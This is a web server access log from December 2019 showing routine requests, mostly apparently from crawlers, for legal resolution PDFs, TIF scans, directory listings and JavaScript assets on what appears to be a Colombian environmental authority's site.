66.249.64.59 - - [08/Dec/2019:00:22:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0041.pdf HTTP/1.1" 200 112972
186.154.33.197 - - [08/Dec/2019:00:23:29 -0500] "GET /BLA/resoluciones/AUTOS%202014/2378.pdf HTTP/1.1" 200 663880
186.154.33.197 - - [08/Dec/2019:00:23:31 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
192.168.175.104 - - [08/Dec/2019:00:23:38 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.59 - - [08/Dec/2019:00:23:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6940.pdf HTTP/1.1" 200 267291
216.244.66.195 - - [08/Dec/2019:00:24:11 -0500] "GET /BLA/resoluciones/AUTOS%202016/1524.pdf HTTP/1.1" 200 606370
66.249.88.25 - - [08/Dec/2019:00:24:44 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.88.19 - - [08/Dec/2019:00:24:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.88.19 - - [08/Dec/2019:00:24:44 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.244.66.195 - - [08/Dec/2019:00:25:01 -0500] "GET /BLA/resoluciones/AUTOS%202016/1685.pdf HTTP/1.1" 200 361073
66.249.64.61 - - [08/Dec/2019:00:25:03 -0500] "GET /BLA/resoluciones/AUTOS%202015/0641.pdf HTTP/1.1" 200 1654542
192.168.175.104 - - [08/Dec/2019:00:25:06 -0500] "GET / HTTP/1.0" 200 9990
69.162.124.232 - - [08/Dec/2019:00:25:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.63 - - [08/Dec/2019:00:25:46 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/ HTTP/1.1" 200 4098
66.249.64.59 - - [08/Dec/2019:00:26:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0445.pdf HTTP/1.1" 200 86513
201.245.192.253 - - [08/Dec/2019:00:26:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29342
66.249.64.59 - - [08/Dec/2019:00:27:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201401%20AL%201500/RESOLUCION%201454%20DE%202007.pdf HTTP/1.1" 304 -
216.244.66.195 - - [08/Dec/2019:00:27:21 -0500] "GET /BLA/resoluciones/AUTOS%202016/1912.pdf HTTP/1.1" 200 510167
190.25.248.2 - - [08/Dec/2019:00:27:24 -0500] "-" 408 -
190.25.248.2 - - [08/Dec/2019:00:27:24 -0500] "-" 408 -
190.25.248.2 - - [08/Dec/2019:00:27:24 -0500] "-" 408 -
190.25.248.2 - - [08/Dec/2019:00:27:25 -0500] "-" 408 -
190.25.248.2 - - [08/Dec/2019:00:27:25 -0500] "-" 408 -
190.25.248.2 - - [08/Dec/2019:00:27:25 -0500] "-" 408 -
190.25.248.2 - - [08/Dec/2019:00:27:31 -0500] "-" 408 -
190.25.248.2 - - [08/Dec/2019:00:27:31 -0500] "-" 408 -
190.25.248.2 - - [08/Dec/2019:00:27:31 -0500] "-" 408 -
190.25.248.2 - - [08/Dec/2019:00:27:32 -0500] "-" 408 -
190.25.248.2 - - [08/Dec/2019:00:27:32 -0500] "-" 408 -
66.249.64.63 - - [08/Dec/2019:00:27:54 -0500] "GET /BLA/resoluciones/AUTOS%202013/0479.pdf HTTP/1.1" 304 -
216.244.66.195 - - [08/Dec/2019:00:28:11 -0500] "GET /BLA/resoluciones/AUTOS%202016/1947.pdf HTTP/1.1" 200 503820
192.168.175.104 - - [08/Dec/2019:00:28:36 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.63 - - [08/Dec/2019:00:28:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/0184.pdf HTTP/1.1" 304 -
192.168.175.104 - - [08/Dec/2019:00:30:05 -0500] "GET / HTTP/1.0" 200 9990
181.53.12.7 - - [08/Dec/2019:00:30:26 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.53.12.7 - - [08/Dec/2019:00:30:26 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.53.12.7 - - [08/Dec/2019:00:30:26 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.244.66.195 - - [08/Dec/2019:00:30:31 -0500] "GET /BLA/resoluciones/AUTOS%202016/1950.pdf HTTP/1.1" 200 501128
181.53.12.7 - - [08/Dec/2019:00:30:38 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 304 -
181.53.12.7 - - [08/Dec/2019:00:30:39 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 304 -
181.53.12.7 - - [08/Dec/2019:00:30:39 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 304 -
69.162.124.232 - - [08/Dec/2019:00:30:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.63 - - [08/Dec/2019:00:30:46 -0500] "GET /BLA/resoluciones/AUTOS%202017/0879.pdf HTTP/1.1" 200 1842020
186.155.113.236 - - [08/Dec/2019:00:30:52 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.155.113.236 - - [08/Dec/2019:00:30:52 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.155.113.236 - - [08/Dec/2019:00:30:52 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.155.113.236 - - [08/Dec/2019:00:30:59 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 304 -
186.155.113.236 - - [08/Dec/2019:00:30:59 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 304 -
186.155.113.236 - - [08/Dec/2019:00:30:59 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 304 -
190.130.66.51 - - [08/Dec/2019:00:31:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.130.66.51 - - [08/Dec/2019:00:31:07 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.130.66.51 - - [08/Dec/2019:00:31:07 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
40.77.167.179 - - [08/Dec/2019:00:31:29 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.29 - - [08/Dec/2019:00:31:29 -0500] "GET /Residuos/maderas/files/guia_maderas.pdf HTTP/1.1" 304 -
66.249.88.19 - - [08/Dec/2019:00:32:12 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.88.23 - - [08/Dec/2019:00:32:12 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.88.19 - - [08/Dec/2019:00:32:12 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.244.66.195 - - [08/Dec/2019:00:32:54 -0500] "GET /BLA/resoluciones/AUTOS%202016/2703.pdf HTTP/1.1" 200 708273
192.168.175.104 - - [08/Dec/2019:00:33:34 -0500] "GET / HTTP/1.1" 200 9990
54.36.150.177 - - [08/Dec/2019:00:34:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%202151-2200/00002179.tif HTTP/1.1" 200 426104
66.249.64.59 - - [08/Dec/2019:00:34:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1456.pdf HTTP/1.1" 200 803986
1.80.247.178 - - [08/Dec/2019:00:34:46 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
192.168.175.104 - - [08/Dec/2019:00:35:03 -0500] "GET / HTTP/1.0" 200 9990
216.244.66.195 - - [08/Dec/2019:00:35:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0293.pdf HTTP/1.1" 200 443838
54.36.150.145 - - [08/Dec/2019:00:35:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201051-1100/00001087.tif HTTP/1.1" 200 219792
69.162.124.232 - - [08/Dec/2019:00:35:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.61 - - [08/Dec/2019:00:36:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1287.pdf HTTP/1.1" 200 579601
201.245.192.253 - - [08/Dec/2019:00:36:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29342
66.249.64.59 - - [08/Dec/2019:00:37:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0693.pdf HTTP/1.1" 200 3440049
201.217.215.186 - - [08/Dec/2019:00:37:30 -0500] "GET /BLA/resoluciones/AUTOS%202013/2893.pdf HTTP/1.1" 200 583831
201.217.215.186 - - [08/Dec/2019:00:37:31 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.244.66.195 - - [08/Dec/2019:00:37:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1829.pdf HTTP/1.1" 200 502150
177.11.136.85 - - [08/Dec/2019:00:37:35 -0500] "GET / HTTP/1.1" 200 9990
186.84.90.231 - - [08/Dec/2019:00:38:01 -0500] "-" 408 -
54.36.150.174 - - [08/Dec/2019:00:38:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%201101-1150/1126.tif HTTP/1.1" 200 179696
216.244.66.195 - - [08/Dec/2019:00:38:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1839.pdf HTTP/1.1" 200 516276
186.154.33.189 - - [08/Dec/2019:00:38:30 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.154.33.189 - - [08/Dec/2019:00:38:30 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.154.33.189 - - [08/Dec/2019:00:38:30 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
192.168.175.104 - - [08/Dec/2019:00:38:33 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.63 - - [08/Dec/2019:00:38:39 -0500] "GET /BLA/resoluciones/AUTOS%202016/1132.pdf HTTP/1.1" 200 295426
207.46.13.210 - - [08/Dec/2019:00:39:03 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2022%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1563219
66.249.64.61 - - [08/Dec/2019:00:39:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20401%20AL%20500/RESOLUCION%200498%20DE%202007.pdf HTTP/1.1" 200 657655
66.249.64.59 - - [08/Dec/2019:00:39:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203401%20AL%203500/RESOLUCION%203448%20DE%202007.pdf HTTP/1.1" 200 1048712
192.168.175.104 - - [08/Dec/2019:00:40:01 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.59 - - [08/Dec/2019:00:40:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202401%20AL%202500/RESOLUCION%202437%20DE%202007.pdf HTTP/1.1" 200 513081
179.18.32.213 - - [08/Dec/2019:00:40:30 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
179.18.32.213 - - [08/Dec/2019:00:40:30 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
179.18.32.213 - - [08/Dec/2019:00:40:30 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
179.18.32.213 - - [08/Dec/2019:00:40:35 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 304 -
179.18.32.213 - - [08/Dec/2019:00:40:35 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 304 -
179.18.32.213 - - [08/Dec/2019:00:40:35 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 304 -
216.244.66.195 - - [08/Dec/2019:00:40:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2286.pdf HTTP/1.1" 200 551622
69.162.124.232 - - [08/Dec/2019:00:40:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.61 - - [08/Dec/2019:00:40:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4765.pdf HTTP/1.1" 304 -
66.249.64.61 - - [08/Dec/2019:00:41:30 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202015/2989.doc HTTP/1.1" 304 -
66.249.64.61 - - [08/Dec/2019:00:42:31 -0500] "GET /galeria/nivo-slider/demo/demo.html HTTP/1.1" 404 1382
216.244.66.195 - - [08/Dec/2019:00:43:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0198.pdf HTTP/1.1" 200 1797806
192.168.175.104 - - [08/Dec/2019:00:43:32 -0500] "GET / HTTP/1.1" 200 9990
66.249.88.25 - - [08/Dec/2019:00:43:59 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.88.19 - - [08/Dec/2019:00:43:59 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.88.19 - - [08/Dec/2019:00:43:59 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.64.59 - - [08/Dec/2019:00:44:22 -0500] "GET /BLA/resoluciones/AUTOS%202018/1466.pdf HTTP/1.1" 304 -
192.168.175.104 - - [08/Dec/2019:00:44:59 -0500] "GET / HTTP/1.0" 200 9990
186.183.201.107 - - [08/Dec/2019:00:45:00 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.183.201.107 - - [08/Dec/2019:00:45:01 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.183.201.107 - - [08/Dec/2019:00:45:02 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.64.63 - - [08/Dec/2019:00:45:05 -0500] "GET /BLA/resoluciones/AUTOS%202015/1063.pdf HTTP/1.1" 304 -
54.36.148.102 - - [08/Dec/2019:00:45:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20951-1000/964.tif HTTP/1.1" 200 142420
66.249.64.61 - - [08/Dec/2019:00:45:21 -0500] "GET /BLA/resoluciones/AUTOS%202007/0810.pdf HTTP/1.1" 200 245567
216.244.66.195 - - [08/Dec/2019:00:45:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0215.pdf HTTP/1.1" 200 272541
69.162.124.232 - - [08/Dec/2019:00:45:43 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.242 - - [08/Dec/2019:00:46:01 -0500] "GET /bla/resoluciones/resoluciones%202015/0995.pdf HTTP/1.1" 200 6388920
186.84.20.145 - - [08/Dec/2019:00:46:21 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 11866
186.84.20.145 - - [08/Dec/2019:00:46:26 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2007%2F HTTP/1.1" 200 26446
186.84.20.145 - - [08/Dec/2019:00:46:39 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2007%2FRES+2007+801+AL+900%2F HTTP/1.1" 200 26642
186.84.20.145 - - [08/Dec/2019:00:46:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20801%20AL%20900/RESOLUCION%200803%20DE%202007.pdf HTTP/1.1" 200 251293
216.244.66.195 - - [08/Dec/2019:00:47:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0761.pdf HTTP/1.1" 200 627088
216.244.66.195 - - [08/Dec/2019:00:47:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1094.pdf HTTP/1.1" 200 541743
66.249.64.61 - - [08/Dec/2019:00:47:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0487.pdf HTTP/1.1" 200 482389
216.244.66.195 - - [08/Dec/2019:00:48:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2208.pdf HTTP/1.1" 200 323266
192.168.175.104 - - [08/Dec/2019:00:48:29 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.59 - - [08/Dec/2019:00:48:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201301%20AL%201400/RESOLUCION%201369%20DE%202007.pdf HTTP/1.1" 200 229104
216.244.66.195 - - [08/Dec/2019:00:49:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2457.pdf HTTP/1.1" 200 378702
192.168.175.104 - - [08/Dec/2019:00:49:57 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.63 - - [08/Dec/2019:00:50:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/2850.pdf HTTP/1.1" 304 -
69.162.124.232 - - [08/Dec/2019:00:50:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.59 - - [08/Dec/2019:00:50:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2845.pdf HTTP/1.1" 200 860673
40.77.190.243 - - [08/Dec/2019:00:51:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/0995.pdf HTTP/1.1" 200 6388920
66.249.83.82 - - [08/Dec/2019:00:52:42 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.83.82 - - [08/Dec/2019:00:52:42 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.83.82 - - [08/Dec/2019:00:52:42 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.83.83 - - [08/Dec/2019:00:52:44 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 304 -
66.249.83.81 - - [08/Dec/2019:00:52:44 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 304 -
46.229.168.162 - - [08/Dec/2019:00:52:53 -0500] "GET /robots.txt HTTP/1.1" 404 1019
46.229.168.162 - - [08/Dec/2019:00:52:55 -0500] "GET /Anexos%20estudio%20Organizacional%20SDA/index.php?dir=ANEXO%2BNo.%2B6%2B-%2BAN%C1LISIS%2BCOMPARADO%2BDECRETOS%2B109%2BY%2B175%2B2009%2BVRS.%2BESTUDIO%2BSERAMBIENTE%2F HTTP/1.1" 200 6256
66.249.64.63 - - [08/Dec/2019:00:52:57 -0500] "GET /BLA/resoluciones/AUTOS%202015/6825.pdf HTTP/1.1" 304 -
54.36.150.57 - - [08/Dec/2019:00:53:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%20301-350/00000333.tif HTTP/1.1" 200 163110
192.168.175.104 - - [08/Dec/2019:00:53:27 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.61 - - [08/Dec/2019:00:53:40 -0500] "GET /BLA/resoluciones/AUTOS%202017/3487.pdf HTTP/1.1" 304 -
181.63.183.122 - - [08/Dec/2019:00:54:08 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.63.183.122 - - [08/Dec/2019:00:54:08 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.63.183.122 - - [08/Dec/2019:00:54:08 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.64.61 - - [08/Dec/2019:00:54:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0159.pdf HTTP/1.1" 200 757342
190.24.16.75 - - [08/Dec/2019:00:54:42 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.24.16.75 - - [08/Dec/2019:00:54:42 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.24.16.75 - - [08/Dec/2019:00:54:42 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.24.16.75 - - [08/Dec/2019:00:54:45 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 304 -
190.24.16.75 - - [08/Dec/2019:00:54:45 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 304 -
190.24.16.75 - - [08/Dec/2019:00:54:45 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 304 -
190.25.89.113 - - [08/Dec/2019:00:54:49 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.25.89.113 - - [08/Dec/2019:00:54:49 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.25.89.113 - - [08/Dec/2019:00:54:49 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
192.168.175.104 - - [08/Dec/2019:00:54:55 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.59 - - [08/Dec/2019:00:55:06 -0500] "GET /BLA/resoluciones/AUTOS%202013/0476.pdf HTTP/1.1" 304 -
207.46.13.242 - - [08/Dec/2019:00:55:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204001%20AL%204100/RESOLUCION%204090%20DE%202007.pdf HTTP/1.1" 304 -
69.162.124.232 - - [08/Dec/2019:00:55:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.59 - - [08/Dec/2019:00:55:49 -0500] "GET /BLA/resoluciones/AUTOS%202013/1140.pdf HTTP/1.1" 304 -
54.36.150.71 - - [08/Dec/2019:00:56:00 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2004%2FRES+2004+1551-1600%2F HTTP/1.1" 200 12345
66.249.64.63 - - [08/Dec/2019:00:56:32 -0500] "GET /BLA/resoluciones/AUTOS%202018/3869.pdf HTTP/1.1" 304 -
66.249.64.61 - - [08/Dec/2019:00:57:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3773.pdf HTTP/1.1" 200 451470
187.206.4.161 - - [08/Dec/2019:00:57:50 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
187.206.4.161 - - [08/Dec/2019:00:57:50 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
187.206.4.161 - - [08/Dec/2019:00:57:50 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
54.36.150.12 - - [08/Dec/2019:00:57:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20401-450/406.tif HTTP/1.1" 200 121184
187.206.4.161 - - [08/Dec/2019:00:57:57 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
187.206.4.161 - - [08/Dec/2019:00:57:57 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
187.206.4.161 - - [08/Dec/2019:00:57:57 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.64.63 - - [08/Dec/2019:00:57:58 -0500] "GET /BLA/resoluciones/AUTOS%202008/1876.pdf HTTP/1.1" 304 -
192.168.175.104 - - [08/Dec/2019:00:58:24 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.63 - - [08/Dec/2019:00:58:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3498.pdf HTTP/1.1" 304 -
66.249.64.61 - - [08/Dec/2019:00:59:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202801%20AL%202900/RESOLUCION%202848%20DE%202007.pdf HTTP/1.1" 304 -
40.77.188.74 - - [08/Dec/2019:00:59:36 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
40.77.189.185 - - [08/Dec/2019:00:59:36 -0500] "GET /BLA/boletinlegal/js/ajax.js HTTP/1.1" 200 772
40.77.190.126 - - [08/Dec/2019:00:59:37 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
40.77.189.10 - - [08/Dec/2019:00:59:38 -0500] "GET /BLA/boletinlegal/swfobject.js HTTP/1.1" 200 9763
40.77.190.252 - - [08/Dec/2019:00:59:39 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
40.77.189.10 - - [08/Dec/2019:00:59:39 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
40.77.188.107 - - [08/Dec/2019:00:59:40 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
66.249.64.61 - - [08/Dec/2019:00:59:41 -0500] "GET /resoluciones/RESOLUCIONES%25202009/1050.pdf HTTP/1.1" 404 1018
66.249.64.59 - - [08/Dec/2019:00:59:47 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202018/03374.pdf HTTP/1.1" 200 300570
66.249.64.59 - - [08/Dec/2019:00:59:54 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/4147.pdf HTTP/1.1" 200 272663
192.168.175.104 - - [08/Dec/2019:00:59:54 -0500] "GET / HTTP/1.0" 200 9990
40.77.167.38 - - [08/Dec/2019:01:00:06 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%203%20del%2023%20de%20Junio%20de%202011.pdf HTTP/1.1" 200 1452758
66.249.64.59 - - [08/Dec/2019:01:00:07 -0500] "GET /BLA/resoluciones/AUTOS%202015/1430.pdf HTTP/1.1" 304 -
66.249.64.59 - - [08/Dec/2019:01:00:19 -0500] "GET /BLA/resoluciones/AUTOS%202015/6600.pdf HTTP/1.1" 200 507199
179.18.56.14 - - [08/Dec/2019:01:00:26 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
179.18.56.14 - - [08/Dec/2019:01:00:26 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
179.18.56.14 - - [08/Dec/2019:01:00:26 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.64.59 - - [08/Dec/2019:01:00:27 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202019/3193.pdf HTTP/1.1" 200 329400
69.162.124.232 - - [08/Dec/2019:01:00:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.61 - - [08/Dec/2019:01:00:46 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202019/2542.pdf HTTP/1.1" 200 257581
186.113.10.19 - - [08/Dec/2019:01:01:14 -0500] "GET /galeria/nivo-slider/demo/images/Bannerpread2019.jpg HTTP/1.1" 304 -
66.249.64.59 - - [08/Dec/2019:01:01:25 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202019/2060.pdf HTTP/1.1" 200 921796
66.249.64.59 - - [08/Dec/2019:01:01:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0040.pdf HTTP/1.1" 304 -
66.249.64.63 - - [08/Dec/2019:01:01:37 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202018/6267.pdf HTTP/1.1" 200 779209
66.249.64.61 - - [08/Dec/2019:01:01:51 -0500] "GET /sig/Gesti%C3%83%C2%B3n%20de%20Recursos%20F%C3%83%C2%ADsicos/126PA04-PR08.pdf HTTP/1.1" 404 1018
66.249.64.59 - - [08/Dec/2019:01:02:16 -0500] "GET /BLA/resoluciones/AUTOS%202017/5310.pdf HTTP/1.1" 304 -
66.249.64.59 - - [08/Dec/2019:01:02:19 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202018/6147.pdf HTTP/1.1" 200 271773
181.50.129.88 - - [08/Dec/2019:01:02:22 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.50.129.88 - - [08/Dec/2019:01:02:23 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.50.129.88 - - [08/Dec/2019:01:02:23 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.50.129.88 - - [08/Dec/2019:01:02:23 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
181.50.129.88 - - [08/Dec/2019:01:02:24 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
181.50.129.88 - - [08/Dec/2019:01:02:24 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
181.50.129.88 - - [08/Dec/2019:01:02:26 -0500] "GET /galeria/nivo-slider/demo/inicio.html HTTP/1.1" 200 4350
181.50.129.88 - - [08/Dec/2019:01:02:28 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
181.50.129.88 - - [08/Dec/2019:01:02:28 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
